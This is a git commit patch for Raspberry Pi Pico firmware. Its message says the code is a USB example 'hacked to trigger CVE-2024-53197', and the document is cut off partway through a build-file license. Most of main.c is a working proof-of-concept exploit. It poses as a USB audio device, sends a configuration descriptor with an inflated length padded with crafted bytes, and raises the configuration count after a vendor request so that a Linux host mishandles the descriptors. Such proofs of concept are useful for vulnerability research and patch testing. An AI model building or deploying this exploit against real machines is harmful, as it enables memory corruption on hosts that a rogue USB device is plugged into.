From d689dc008db009bec68f74e16a5b5aeccfce9d17 Mon Sep 17 00:00:00 2001 From: itycodes Date: Sat, 19 Apr 2025 21:13:45 +0200 Subject: [PATCH] Initial commit I include the shell env files that point to my home dir for my own convenience. Otherwise, this uses the Pico SDK, with the setup based on their repo's README. I don't actually properly config picotool or anything, so this thing compiles a (limited version of it) itself. The code is based on https://github.com/raspberrypi/pico-examples/blob/master/usb/device/dev_lowlevel/dev_lowlevel.c which was hacked to trigger CVE-2024-53197. The code desperately needs cleaning. --- CMakeLists.txt | 23 ++ main.c | 901 ++++++++++++++++++++++++++++++++++++++++++ pico_sdk_import.cmake | 121 ++++++ sdk.env | 1 + sdk.nu | 1 + 5 files changed, 1047 insertions(+) create mode 100644 CMakeLists.txt create mode 100644 main.c create mode 100644 pico_sdk_import.cmake create mode 100644 sdk.env create mode 100644 sdk.nu diff --git a/CMakeLists.txt b/CMakeLists.txt new file mode 100644 index 0000000..28f74d7 --- /dev/null +++ b/CMakeLists.txt @@ -0,0 +1,23 @@ +cmake_minimum_required(VERSION 4.0) + +# initialize the SDK based on PICO_SDK_PATH +# note: this must happen before project() +include(pico_sdk_import.cmake) + +project(my_project) + +# initialize the Raspberry Pi Pico SDK +pico_sdk_init() + + +# rest of your project +add_executable(main + main.c +) + +target_compile_definitions(main PRIVATE PICO_STDIO_USB_CONNECT_WAIT_TIMEOUT_MS=5000) + +# Add pico_stdlib library which aggregates commonly used features +target_link_libraries(main PRIVATE pico_stdlib hardware_resets hardware_irq) +# create map/bin/hex/uf2 file in addition to ELF. +pico_add_extra_outputs(main) diff --git a/main.c b/main.c new file mode 100644 index 0000000..3779281 --- /dev/null +++ b/main.c @@ -0,0 +1,901 @@ +/** + * Copyright (c) 2020 Raspberry Pi (Trading) Ltd. + * + * SPDX-License-Identifier: BSD-3-Clause + */ + +#include + +// Pico +#include "pico/stdlib.h" + +// For memcpy +#include + +// Include descriptor struct definitions +/* + * Copyright (c) 2020 Raspberry Pi (Trading) Ltd. + * + * SPDX-License-Identifier: BSD-3-Clause + */ + +#ifndef _USB_COMMON_H +#define _USB_COMMON_H + +#include "pico/types.h" +#include "hardware/structs/usb.h" + +// bmRequestType bit definitions +#define USB_REQ_TYPE_STANDARD 0x00u +#define USB_REQ_TYPE_TYPE_MASK 0x60u +#define USB_REQ_TYPE_TYPE_CLASS 0x20u +#define USB_REQ_TYPE_TYPE_VENDOR 0x40u + +#define USB_REQ_TYPE_RECIPIENT_MASK 0x1fu +#define USB_REQ_TYPE_RECIPIENT_DEVICE 0x00u +#define USB_REQ_TYPE_RECIPIENT_INTERFACE 0x01u +#define USB_REQ_TYPE_RECIPIENT_ENDPOINT 0x02u + +#define USB_DIR_OUT 0x00u +#define USB_DIR_IN 0x80u + +#define USB_TRANSFER_TYPE_CONTROL 0x0 +#define USB_TRANSFER_TYPE_ISOCHRONOUS 0x1 +#define USB_TRANSFER_TYPE_BULK 0x2 +#define USB_TRANSFER_TYPE_INTERRUPT 0x3 +#define USB_TRANSFER_TYPE_BITS 0x3 + +// Descriptor types +#define USB_DT_DEVICE 0x01 +#define USB_DT_CONFIG 0x02 +#define USB_DT_STRING 0x03 +#define USB_DT_INTERFACE 0x04 +#define USB_DT_ENDPOINT 0x05 + +#define USB_REQUEST_GET_STATUS 0x0 +#define USB_REQUEST_CLEAR_FEATURE 0x01 +#define USB_REQUEST_SET_FEATURE 0x03 +#define USB_REQUEST_SET_ADDRESS 0x05 +#define USB_REQUEST_GET_DESCRIPTOR 0x06 +#define USB_REQUEST_SET_DESCRIPTOR 0x07 +#define USB_REQUEST_GET_CONFIGURATION 0x08 +#define USB_REQUEST_SET_CONFIGURATION 0x09 +#define USB_REQUEST_GET_INTERFACE 0x0a +#define USB_REQUEST_SET_INTERFACE 0x0b +#define USB_REQUEST_SYNC_FRAME 0x0c + +#define USB_REQUEST_MSC_GET_MAX_LUN 0xfe +#define USB_REQUEST_MSC_RESET 0xff + +#define USB_FEAT_ENDPOINT_HALT 0x00 +#define USB_FEAT_DEVICE_REMOTE_WAKEUP 0x01 +#define USB_FEAT_TEST_MODE 0x02 + +#define USB_DESCRIPTOR_TYPE_ENDPOINT 0x05 + +struct usb_setup_packet { + uint8_t bmRequestType; + uint8_t bRequest; + uint16_t wValue; + uint16_t wIndex; + uint16_t wLength; +} __packed; + +struct usb_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; +}; + +struct usb_device_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; + uint16_t bcdUSB; + uint8_t bDeviceClass; + uint8_t bDeviceSubClass; + uint8_t bDeviceProtocol; + uint8_t bMaxPacketSize0; + uint16_t idVendor; + uint16_t idProduct; + uint16_t bcdDevice; + uint8_t iManufacturer; + uint8_t iProduct; + uint8_t iSerialNumber; + uint8_t bNumConfigurations; +} __packed; + +struct usb_configuration_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; + uint16_t wTotalLength; + uint8_t bNumInterfaces; + uint8_t bConfigurationValue; + uint8_t iConfiguration; + uint8_t bmAttributes; + uint8_t bMaxPower; +} __packed; + +struct usb_interface_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; + uint8_t bInterfaceNumber; + uint8_t bAlternateSetting; + uint8_t bNumEndpoints; + uint8_t bInterfaceClass; + uint8_t bInterfaceSubClass; + uint8_t bInterfaceProtocol; + uint8_t iInterface; +} __packed; + +struct usb_endpoint_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; + uint8_t bEndpointAddress; + uint8_t bmAttributes; + uint16_t wMaxPacketSize; + uint8_t bInterval; +} __packed; + +struct usb_endpoint_descriptor_long { + uint8_t bLength; + uint8_t bDescriptorType; + uint8_t bEndpointAddress; + uint8_t bmAttributes; + uint16_t wMaxPacketSize; + uint8_t bInterval; + uint8_t bRefresh; + uint8_t bSyncAddr; +} __attribute__((packed)); + +#endif +// USB register definitions from pico-sdk +#include "hardware/regs/usb.h" +// USB hardware struct definitions from pico-sdk +#include "hardware/structs/usb.h" +// For interrupt enable and numbers +#include "hardware/irq.h" +// For resetting the USB controller +#include "hardware/resets.h" + +/** + * Copyright (c) 2020 Raspberry Pi (Trading) Ltd. + * + * SPDX-License-Identifier: BSD-3-Clause + */ + +#ifndef DEV_LOWLEVEL_H_ +#define DEV_LOWLEVEL_H_ + +typedef void (*usb_ep_handler)(uint8_t *buf, uint16_t len); + +// Struct in which we keep the endpoint configuration +struct usb_endpoint_configuration { + const struct usb_endpoint_descriptor *descriptor; + usb_ep_handler handler; + + // Pointers to endpoint + buffer control registers + // in the USB controller DPSRAM + volatile uint32_t *endpoint_control; + volatile uint32_t *buffer_control; + volatile uint8_t *data_buffer; + + // Toggle after each packet (unless replying to a SETUP) + uint8_t next_pid; +}; + +// Struct in which we keep the device configuration +struct usb_device_configuration { + struct usb_device_descriptor *device_descriptor; + const struct usb_interface_descriptor *interface_descriptor; + const struct usb_configuration_descriptor *config_descriptor; + const unsigned char *lang_descriptor; + const unsigned char **descriptor_strings; + // USB num endpoints is 16 + struct usb_endpoint_configuration endpoints[USB_NUM_ENDPOINTS]; +}; + +#define EP0_IN_ADDR (USB_DIR_IN | 0) +#define EP0_OUT_ADDR (USB_DIR_OUT | 0) +#define EP1_OUT_ADDR (USB_DIR_OUT | 1) +#define EP2_IN_ADDR (USB_DIR_IN | 2) + +// EP0 IN and OUT +static const struct usb_endpoint_descriptor ep0_out = { + .bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DT_ENDPOINT, + .bEndpointAddress = EP0_OUT_ADDR, // EP number 0, OUT from host (rx to device) + .bmAttributes = USB_TRANSFER_TYPE_CONTROL, + .wMaxPacketSize = 64, + .bInterval = 0 +}; + +static const struct usb_endpoint_descriptor ep0_in = { + .bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DT_ENDPOINT, + .bEndpointAddress = EP0_IN_ADDR, // EP number 0, OUT from host (rx to device) + .bmAttributes = USB_TRANSFER_TYPE_CONTROL, + .wMaxPacketSize = 64, + .bInterval = 0 +}; + +// Descriptors +static struct usb_device_descriptor device_descriptor = { + .bLength = sizeof(struct usb_device_descriptor), + .bDescriptorType = USB_DT_DEVICE, + .bcdUSB = 0x0110, // USB 1.1 device + .bDeviceClass = 0, // Specified in interface descriptor + .bDeviceSubClass = 0, // No subclass + .bDeviceProtocol = 0, // No protocol + .bMaxPacketSize0 = 64, // Max packet size for ep0 + .idVendor = 0x0dba, // Your vendor id + .idProduct = 0x3000, // Your product ID + .bcdDevice = 0, // No device revision number + .iManufacturer = 1, // Manufacturer string index + .iProduct = 2, // Product string index + .iSerialNumber = 0, // No serial number + .bNumConfigurations = 1 // One configuration +}; + +static const struct usb_interface_descriptor interface_descriptor = { + .bLength = sizeof(struct usb_interface_descriptor), + .bDescriptorType = USB_DT_INTERFACE, + .bInterfaceNumber = 0, + .bAlternateSetting = 0, + .bNumEndpoints = 2, // Interface has 2 endpoints + .bInterfaceClass = 1, // Vendor specific endpoint + .bInterfaceSubClass = 1, + .bInterfaceProtocol = 0, + .iInterface = 0 +}; + +static const struct usb_endpoint_descriptor ep1_out = { + .bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DT_ENDPOINT, + .bEndpointAddress = EP1_OUT_ADDR, // EP number 1, OUT from host (rx to device) + .bmAttributes = USB_TRANSFER_TYPE_BULK, + .wMaxPacketSize = 64, + .bInterval = 0 +}; + +static const struct usb_endpoint_descriptor ep2_in = { + .bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DT_ENDPOINT, + .bEndpointAddress = EP2_IN_ADDR, // EP number 2, IN from host (tx from device) + .bmAttributes = USB_TRANSFER_TYPE_BULK, + .wMaxPacketSize = 64, + .bInterval = 0 +}; + +static const struct usb_configuration_descriptor config_descriptor = { + .bLength = sizeof(struct usb_configuration_descriptor), + .bDescriptorType = USB_DT_CONFIG, + .wTotalLength = 646, + .bNumInterfaces = 1, + .bConfigurationValue = 1, // Configuration 1 + .iConfiguration = 0, // No string + .bmAttributes = 0xc0, // attributes: self powered, no remote wakeup + .bMaxPower = 0x32 // 100ma +}; + +static const unsigned char lang_descriptor[] = { + 8, // bLength + 0x03, // bDescriptorType == String Descriptor + 0x09, 0x04, // language id = us english + +}; + +static const unsigned char *descriptor_strings[] = { + (unsigned char *) "Raspberry Pi", // Vendor + (unsigned char *) "Pico Test Device" // Product +}; + +#endif + +#define usb_hw_set ((usb_hw_t *)hw_set_alias_untyped(usb_hw)) +#define usb_hw_clear ((usb_hw_t *)hw_clear_alias_untyped(usb_hw)) + +// Function prototypes for our device specific endpoint handlers defined +// later on +void ep0_in_handler(uint8_t *buf, uint16_t len); +void ep0_out_handler(uint8_t *buf, uint16_t len); +void ep1_out_handler(uint8_t *buf, uint16_t len); +void ep2_in_handler(uint8_t *buf, uint16_t len); + +// Global device address +static bool should_set_address = false; +static uint8_t dev_addr = 0; +static volatile bool configured = false; + +// Global data buffer for EP0 +static uint8_t ep0_buf[1024]; + +// Struct defining the device configuration +static struct usb_device_configuration dev_config = { + .device_descriptor = &device_descriptor, + .interface_descriptor = &interface_descriptor, + .config_descriptor = &config_descriptor, + .lang_descriptor = lang_descriptor, + .descriptor_strings = descriptor_strings, + .endpoints = { + { + .descriptor = &ep0_out, + .handler = &ep0_out_handler, + .endpoint_control = NULL, // NA for EP0 + .buffer_control = &usb_dpram->ep_buf_ctrl[0].out, + // EP0 in and out share a data buffer + .data_buffer = &usb_dpram->ep0_buf_a[0], + }, + { + .descriptor = &ep0_in, + .handler = &ep0_in_handler, + .endpoint_control = NULL, // NA for EP0, + .buffer_control = &usb_dpram->ep_buf_ctrl[0].in, + // EP0 in and out share a data buffer + .data_buffer = &usb_dpram->ep0_buf_a[0], + }, + { + .descriptor = &ep1_out, + .handler = &ep1_out_handler, + // EP1 starts at offset 0 for endpoint control + .endpoint_control = &usb_dpram->ep_ctrl[0].out, + .buffer_control = &usb_dpram->ep_buf_ctrl[1].out, + // First free EPX buffer + .data_buffer = &usb_dpram->epx_data[0 * 64], + }, + { + .descriptor = &ep2_in, + .handler = &ep2_in_handler, + .endpoint_control = &usb_dpram->ep_ctrl[1].in, + .buffer_control = &usb_dpram->ep_buf_ctrl[2].in, + // Second free EPX buffer + .data_buffer = &usb_dpram->epx_data[1 * 64], + } + } +}; + +/** + * @brief Given an endpoint address, return the usb_endpoint_configuration of that endpoint. Returns NULL + * if an endpoint of that address is not found. + * + * @param addr + * @return struct usb_endpoint_configuration* + */ +struct usb_endpoint_configuration *usb_get_endpoint_configuration(uint8_t addr) { + struct usb_endpoint_configuration *endpoints = dev_config.endpoints; + for (int i = 0; i < USB_NUM_ENDPOINTS; i++) { + if (endpoints[i].descriptor && (endpoints[i].descriptor->bEndpointAddress == addr)) { + return &endpoints[i]; + } + } + return NULL; +} + +/** + * @brief Given a C string, fill the EP0 data buf with a USB string descriptor for that string. + * + * @param C string you would like to send to the USB host + * @return the length of the string descriptor in EP0 buf + */ +uint8_t usb_prepare_string_descriptor(const unsigned char *str) { + // 2 for bLength + bDescriptorType + strlen * 2 because string is unicode. i.e. other byte will be 0 + uint8_t bLength = 2 + (strlen((const char *)str) * 2); + static const uint8_t bDescriptorType = 0x03; + + volatile uint8_t *buf = &ep0_buf[0]; + *buf++ = bLength; + *buf++ = bDescriptorType; + + uint8_t c; + + do { + c = *str++; + *buf++ = c; + *buf++ = 0; + } while (c != '\0'); + + return bLength; +} + +/** + * @brief Take a buffer pointer located in the USB RAM and return as an offset of the RAM. + * + * @param buf + * @return uint32_t + */ +static inline uint32_t usb_buffer_offset(volatile uint8_t *buf) { + return (uint32_t) buf ^ (uint32_t) usb_dpram; +} + +/** + * @brief Set up the endpoint control register for an endpoint (if applicable. Not valid for EP0). + * + * @param ep + */ +void usb_setup_endpoint(const struct usb_endpoint_configuration *ep) { + printf("Set up endpoint 0x%x with buffer address 0x%p\n", ep->descriptor->bEndpointAddress, ep->data_buffer); + + // EP0 doesn't have one so return if that is the case + if (!ep->endpoint_control) { + return; + } + + // Get the data buffer as an offset of the USB controller's DPRAM + uint32_t dpram_offset = usb_buffer_offset(ep->data_buffer); + uint32_t reg = EP_CTRL_ENABLE_BITS + | EP_CTRL_INTERRUPT_PER_BUFFER + | (ep->descriptor->bmAttributes << EP_CTRL_BUFFER_TYPE_LSB) + | dpram_offset; + *ep->endpoint_control = reg; +} + +/** + * @brief Set up the endpoint control register for each endpoint. + * + */ +void usb_setup_endpoints() { + const struct usb_endpoint_configuration *endpoints = dev_config.endpoints; + for (int i = 0; i < USB_NUM_ENDPOINTS; i++) { + if (endpoints[i].descriptor && endpoints[i].handler) { + usb_setup_endpoint(&endpoints[i]); + } + } +} + +/** + * @brief Set up the USB controller in device mode, clearing any previous state. + * + */ +void usb_device_init() { + // Reset usb controller + reset_unreset_block_num_wait_blocking(RESET_USBCTRL); + + // Clear any previous state in dpram just in case + memset(usb_dpram, 0, sizeof(*usb_dpram)); // <1> + + // Enable USB interrupt at processor + irq_set_enabled(USBCTRL_IRQ, true); + + // Mux the controller to the onboard usb phy + usb_hw->muxing = USB_USB_MUXING_TO_PHY_BITS | USB_USB_MUXING_SOFTCON_BITS; + + // Force VBUS detect so the device thinks it is plugged into a host + usb_hw->pwr = USB_USB_PWR_VBUS_DETECT_BITS | USB_USB_PWR_VBUS_DETECT_OVERRIDE_EN_BITS; + + // Enable the USB controller in device mode. + usb_hw->main_ctrl = USB_MAIN_CTRL_CONTROLLER_EN_BITS; + + // Enable an interrupt per EP0 transaction + usb_hw->sie_ctrl = USB_SIE_CTRL_EP0_INT_1BUF_BITS; // <2> + + // Enable interrupts for when a buffer is done, when the bus is reset, + // and when a setup packet is received + usb_hw->inte = USB_INTS_BUFF_STATUS_BITS | + USB_INTS_BUS_RESET_BITS | + USB_INTS_SETUP_REQ_BITS; + + // Set up endpoints (endpoint control registers) + // described by device configuration + usb_setup_endpoints(); + + // Present full speed device by enabling pull up on DP + usb_hw_set->sie_ctrl = USB_SIE_CTRL_PULLUP_EN_BITS; +} + +/** + * @brief Given an endpoint configuration, returns true if the endpoint + * is transmitting data to the host (i.e. is an IN endpoint) + * + * @param ep, the endpoint configuration + * @return true + * @return false + */ +static inline bool ep_is_tx(struct usb_endpoint_configuration *ep) { + return ep->descriptor->bEndpointAddress & USB_DIR_IN; +} + +/** + * @brief Starts a transfer on a given endpoint. + * + * @param ep, the endpoint configuration. + * @param buf, the data buffer to send. Only applicable if the endpoint is TX + * @param len, the length of the data in buf (this example limits max len to one packet - 64 bytes) + */ +void usb_start_transfer(struct usb_endpoint_configuration *ep, uint8_t *buf, uint16_t len) { + // We are asserting that the length is <= 64 bytes for simplicity of the example. + // For multi packet transfers see the tinyusb port. + assert(len <= 64); + + printf("Start transfer of len %d on ep addr 0x%x\n", len, ep->descriptor->bEndpointAddress); + + // Prepare buffer control register value + uint32_t val = len | USB_BUF_CTRL_AVAIL; + + if (ep_is_tx(ep)) { + // Need to copy the data from the user buffer to the usb memory + memcpy((void *) ep->data_buffer, (void *) buf, len); + // Mark as full + val |= USB_BUF_CTRL_FULL; + } + + // Set pid and flip for next transfer + val |= ep->next_pid ? USB_BUF_CTRL_DATA1_PID : USB_BUF_CTRL_DATA0_PID; + ep->next_pid ^= 1u; + + *ep->buffer_control = val; +} + +uint8_t transfered_reset = 0x0; + +/** + * @brief Send device descriptor to host + * + */ +void usb_handle_device_descriptor(volatile struct usb_setup_packet *pkt) { + struct usb_device_descriptor *d = dev_config.device_descriptor; + if(transfered_reset) { + d->bNumConfigurations = 8; + } + // EP0 in + struct usb_endpoint_configuration *ep = usb_get_endpoint_configuration(EP0_IN_ADDR); + // Always respond with pid 1 + ep->next_pid = 1; + usb_start_transfer(ep, (uint8_t *) d, MIN(sizeof(struct usb_device_descriptor), pkt->wLength)); +} + +uint8_t ran = 0; + +uint8_t in_transfer = 0; + + +/** + * @brief Send the configuration descriptor (and potentially the configuration and endpoint descriptors) to the host. + * + * @param pkt, the setup packet received from the host. + */ +void usb_handle_config_descriptor(volatile struct usb_setup_packet *pkt) { + uint8_t *buf = &ep0_buf[0]; + // If we more than just the config descriptor copy it all + if (pkt->wLength >= 64 && in_transfer == 0) { + // First request will want just the config descriptor + const struct usb_configuration_descriptor *d = dev_config.config_descriptor; + memcpy((void *) buf, d, sizeof(struct usb_configuration_descriptor)); + buf += sizeof(struct usb_configuration_descriptor); + memcpy((void *) buf, dev_config.interface_descriptor, sizeof(struct usb_interface_descriptor)); + buf += sizeof(struct usb_interface_descriptor); + const struct usb_endpoint_configuration *ep = dev_config.endpoints; + + // Copy all the endpoint descriptors starting from EP1 + for (uint i = 2; i < USB_NUM_ENDPOINTS; i++) { + if (ep[i].descriptor) { + memcpy((void *) buf, ep[i].descriptor, sizeof(struct usb_endpoint_descriptor)); + buf += sizeof(struct usb_endpoint_descriptor); + } + } + if(transfered_reset) { + uint32_t len = (uint32_t) buf - (uint32_t) &ep0_buf[0]; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], len); + return; + } + if(1) { + uint32_t len = (uint32_t) buf - (uint32_t) &ep0_buf[0]; + const uint8_t siz = 64-len; + memset(buf, 0, siz); + buf[0] = siz; + buf[1] = 0xFF & pkt->wLength; + buf += siz; + } + ran += 1; + in_transfer = 1; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], 64); + uint16_t size = 646; + for(int i = 0; i < 9; i++) { + memset(buf, 0, 64); + buf[0] = 64; + buf[1] = 0xA7; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), buf, 64); + } + const uint8_t len = size % 64; + memset(buf, 0, len); + buf[0] = len; + buf[1] = 0xA7; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), buf, len); + } else if(in_transfer && pkt->wLength >= 64) { + memset(buf, 0, 64); + buf[0] = 64; + buf[1] = 0xA7; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), buf, 64); + } else if(in_transfer) { + in_transfer = 0; + memset(buf, 0, 9); + buf[0] = 9; + buf[1] = 0xA7; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), buf, 9); + } else { + const struct usb_configuration_descriptor *d = dev_config.config_descriptor; + memcpy((void *) buf, d, sizeof(struct usb_configuration_descriptor)); + buf += sizeof(struct usb_configuration_descriptor); + uint32_t len = (uint32_t) buf - (uint32_t) &ep0_buf[0]; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], len); + } +} + +/** + * @brief Handle a BUS RESET from the host by setting the device address back to 0. + * + */ +void usb_bus_reset(void) { + // Set address back to 0 + dev_addr = 0; + should_set_address = false; + usb_hw->dev_addr_ctrl = 0; + configured = false; +} + +/** + * @brief Send the requested string descriptor to the host. + * + * @param pkt, the setup packet from the host. + */ +void usb_handle_string_descriptor(volatile struct usb_setup_packet *pkt) { + uint8_t i = pkt->wValue & 0xff; + uint8_t len = 0; + + if (i == 0) { + len = 4; + memcpy(&ep0_buf[0], dev_config.lang_descriptor, len); + } else { + // Prepare fills in ep0_buf + len = usb_prepare_string_descriptor(dev_config.descriptor_strings[i - 1]); + } + + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], MIN(len, pkt->wLength)); +} + +/** + * @brief Sends a zero length status packet back to the host. + */ +void usb_acknowledge_out_request(void) { + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), NULL, 0); +} + +/** + * @brief Handles a SET_ADDR request from the host. The actual setting of the device address in + * hardware is done in ep0_in_handler. This is because we have to acknowledge the request first + * as a device with address zero. + * + * @param pkt, the setup packet from the host. + */ +void usb_set_device_address(volatile struct usb_setup_packet *pkt) { + // Set address is a bit of a strange case because we have to send a 0 length status packet first with + // address 0 + dev_addr = (pkt->wValue & 0xff); + printf("Set address %d\r\n", dev_addr); + // Will set address in the callback phase + should_set_address = true; + usb_acknowledge_out_request(); +} + +/** + * @brief Handles a SET_CONFIGRUATION request from the host. Assumes one configuration so simply + * sends a zero length status packet back to the host. + * + * @param pkt, the setup packet from the host. + */ +void usb_set_device_configuration(__unused volatile struct usb_setup_packet *pkt) { + // Only one configuration so just acknowledge the request + printf("Device Enumerated\r\n"); + usb_acknowledge_out_request(); + configured = true; +} + + +/** + * @brief Respond to a setup packet from the host. + * + */ +void usb_handle_setup_packet(void) { + volatile struct usb_setup_packet *pkt = (volatile struct usb_setup_packet *) &usb_dpram->setup_packet; + uint8_t req_direction = pkt->bmRequestType; + uint8_t req = pkt->bRequest; + + // Reset PID to 1 for EP0 IN + usb_get_endpoint_configuration(EP0_IN_ADDR)->next_pid = 1u; + + if ((req_direction & 0x80) == USB_DIR_OUT) { + if (req == USB_REQUEST_SET_ADDRESS) { + usb_set_device_address(pkt); + } else if (req == USB_REQUEST_SET_CONFIGURATION) { + usb_set_device_configuration(pkt); + } else { + usb_acknowledge_out_request(); + printf("Other OUT request (0x%x)\r\n", pkt->bRequest); + } + } else if ((req_direction & 0x80) == USB_DIR_IN) { + if (req == USB_REQUEST_GET_DESCRIPTOR) { + uint16_t descriptor_type = pkt->wValue >> 8; + + switch (descriptor_type) { + case USB_DT_DEVICE: + usb_handle_device_descriptor(pkt); + printf("GET DEVICE DESCRIPTOR\r\n"); + break; + + case USB_DT_CONFIG: + usb_handle_config_descriptor(pkt); + printf("GET CONFIG DESCRIPTOR\r\n"); + break; + + case USB_DT_STRING: + usb_handle_string_descriptor(pkt); + printf("GET STRING DESCRIPTOR\r\n"); + break; + + default: + printf("Unhandled GET_DESCRIPTOR type 0x%x\r\n", descriptor_type); + } + } else if (req = 0x85 && !transfered_reset) { + memset(&ep0_buf[0], 0, 12); + ep0_buf[0] = 0x02; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], 12); + transfered_reset = 0x01; + } + + else { + printf("Other IN request (0x%x)\r\n", pkt->bRequest); + } + } +} + +/** + * @brief Notify an endpoint that a transfer has completed. + * + * @param ep, the endpoint to notify. + */ +static void usb_handle_ep_buff_done(struct usb_endpoint_configuration *ep) { + uint32_t buffer_control = *ep->buffer_control; + // Get the transfer length for this endpoint + uint16_t len = buffer_control & USB_BUF_CTRL_LEN_MASK; + + // Call that endpoints buffer done handler + ep->handler((uint8_t *) ep->data_buffer, len); +} + +/** + * @brief Find the endpoint configuration for a specified endpoint number and + * direction and notify it that a transfer has completed. + * + * @param ep_num + * @param in + */ +static void usb_handle_buff_done(uint ep_num, bool in) { + uint8_t ep_addr = ep_num | (in ? USB_DIR_IN : 0); + printf("EP %d (in = %d) done\n", ep_num, in); + for (uint i = 0; i < USB_NUM_ENDPOINTS; i++) { + struct usb_endpoint_configuration *ep = &dev_config.endpoints[i]; + if (ep->descriptor && ep->handler) { + if (ep->descriptor->bEndpointAddress == ep_addr) { + usb_handle_ep_buff_done(ep); + return; + } + } + } +} + +/** + * @brief Handle a "buffer status" irq. This means that one or more + * buffers have been sent / received. Notify each endpoint where this + * is the case. + */ +static void usb_handle_buff_status() { + uint32_t buffers = usb_hw->buf_status; + uint32_t remaining_buffers = buffers; + + uint bit = 1u; + for (uint i = 0; remaining_buffers && i < USB_NUM_ENDPOINTS * 2; i++) { + if (remaining_buffers & bit) { + // clear this in advance + usb_hw_clear->buf_status = bit; + // IN transfer for even i, OUT transfer for odd i + usb_handle_buff_done(i >> 1u, !(i & 1u)); + remaining_buffers &= ~bit; + } + bit <<= 1u; + } +} + +/** + * @brief USB interrupt handler + * + */ +#ifdef __cplusplus +extern "C" { +#endif +/// \tag::isr_setup_packet[] +void isr_usbctrl(void) { + // USB interrupt handler + uint32_t status = usb_hw->ints; + uint32_t handled = 0; + + // Setup packet received + if (status & USB_INTS_SETUP_REQ_BITS) { + handled |= USB_INTS_SETUP_REQ_BITS; + usb_hw_clear->sie_status = USB_SIE_STATUS_SETUP_REC_BITS; + usb_handle_setup_packet(); + } +/// \end::isr_setup_packet[] + + // Buffer status, one or more buffers have completed + if (status & USB_INTS_BUFF_STATUS_BITS) { + handled |= USB_INTS_BUFF_STATUS_BITS; + usb_handle_buff_status(); + } + + // Bus is reset + if (status & USB_INTS_BUS_RESET_BITS) { + printf("BUS RESET\n"); + handled |= USB_INTS_BUS_RESET_BITS; + usb_hw_clear->sie_status = USB_SIE_STATUS_BUS_RESET_BITS; + usb_bus_reset(); + } + + if (status ^ handled) { + panic("Unhandled IRQ 0x%x\n", (uint) (status ^ handled)); + } +} +#ifdef __cplusplus +} +#endif + +/** + * @brief EP0 in transfer complete. Either finish the SET_ADDRESS process, or receive a zero + * length status packet from the host. + * + * @param buf the data that was sent + * @param len the length that was sent + */ +void ep0_in_handler(__unused uint8_t *buf, __unused uint16_t len) { + if (should_set_address) { + // Set actual device address in hardware + usb_hw->dev_addr_ctrl = dev_addr; + should_set_address = false; + } else { + // Receive a zero length status packet from the host on EP0 OUT + struct usb_endpoint_configuration *ep = usb_get_endpoint_configuration(EP0_OUT_ADDR); + usb_start_transfer(ep, NULL, 0); + } +} + +void ep0_out_handler(__unused uint8_t *buf, __unused uint16_t len) { +} + +// Device specific functions +void ep1_out_handler(uint8_t *buf, uint16_t len) { + printf("RX %d bytes from host\n", len); + // Send data back to host + struct usb_endpoint_configuration *ep = usb_get_endpoint_configuration(EP2_IN_ADDR); + usb_start_transfer(ep, buf, len); +} + +void ep2_in_handler(__unused uint8_t *buf, uint16_t len) { + printf("Sent %d bytes to host\n", len); + // Get ready to rx again from host + usb_start_transfer(usb_get_endpoint_configuration(EP1_OUT_ADDR), NULL, 64); +} + +int main(void) { + stdio_init_all(); + printf("USB Device Low-Level hardware example\n"); + usb_device_init(); + + // Wait until configured + while (!configured) { + tight_loop_contents(); + } + + // Get ready to rx from host + usb_start_transfer(usb_get_endpoint_configuration(EP1_OUT_ADDR), NULL, 64); + + // Everything is interrupt driven so just loop here + while (1) { + tight_loop_contents(); + } +} diff --git a/pico_sdk_import.cmake b/pico_sdk_import.cmake new file mode 100644 index 0000000..d493cc2 --- /dev/null +++ b/pico_sdk_import.cmake @@ -0,0 +1,121 @@ +# This is a copy of /external/pico_sdk_import.cmake + +# This can be dropped into an external project to help locate this SDK +# It should be include()ed prior to project() + +# Copyright 2020 (c) 2020 Raspberry Pi (Trading) Ltd. +# +# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the +# following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following +# disclaimer. +# +# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following +# disclaimer in the documentation and/or other materials provided with the distribution. +# +# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products +# derived from this software without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, +# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, +# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF +# THIS 